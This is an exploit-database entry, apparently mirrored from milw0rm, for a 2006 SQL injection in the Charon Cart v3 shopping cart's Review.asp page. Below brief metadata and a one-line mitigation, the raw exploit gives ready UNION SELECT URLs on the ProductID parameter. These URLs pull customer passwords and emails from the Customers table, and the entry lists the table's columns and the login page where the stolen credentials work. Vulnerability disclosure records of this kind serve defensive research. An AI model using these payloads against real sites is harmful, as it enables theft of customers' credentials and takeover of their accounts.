Charon Cart v3(Review.asp) Remote SQL Injection Vulnerability

vendor:

Charon Cart v3

by:

ajann

CVSS

HIGH

SQL Injection

CWE

Product Name: Charon Cart v3

Affected Version From: Charon Cart v3

Affected Version To: Charon Cart v3

Patch Exists: NO

Related CWE: N/A

CPE: a:charon:charon_cart_v3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Charon Cart v3(Review.asp) Remote SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable parameter 'ProductID' in the 'Review.asp' page. This will allow the attacker to gain access to the database and extract sensitive information such as customer emails and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

Vulnerability Report
*******************************************************************************
# Title  :  Charon Cart v3(Review.asp) Remote SQL Injection Vulnerability

# Author :   ajann

# Script Page : http://www.charon.co.uk

# Exploit;

*******************************************************************************

###http://[target]/[path]/Review.asp?ProductID=[SQL HERE]

Example:

//Review.asp?ProductID=-1%20union%20select%20CustomerPassword%20from%20Customers%20Where%20CustomerID%20=%201
//Review.asp?ProductID=-1%20union%20select%20CustomerEmail%20from%20Customers%20Where%20CustomerID%20=%201
Email and Password ==> login.asp [L0gin P4Ge]

Columns;
"""""""""""""""""""""
CustomerID
"""""""""""""""""""""
CustomerEmail
"""""""""""""""""""""
CustomerPassword
"""""""""""""""""""""
ShipCountry
"""""""""""""""""""""
Phone
"""""""""""""""""""""
.........
"""""""""""""""""""""
....
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!

# milw0rm.com [2006-09-17]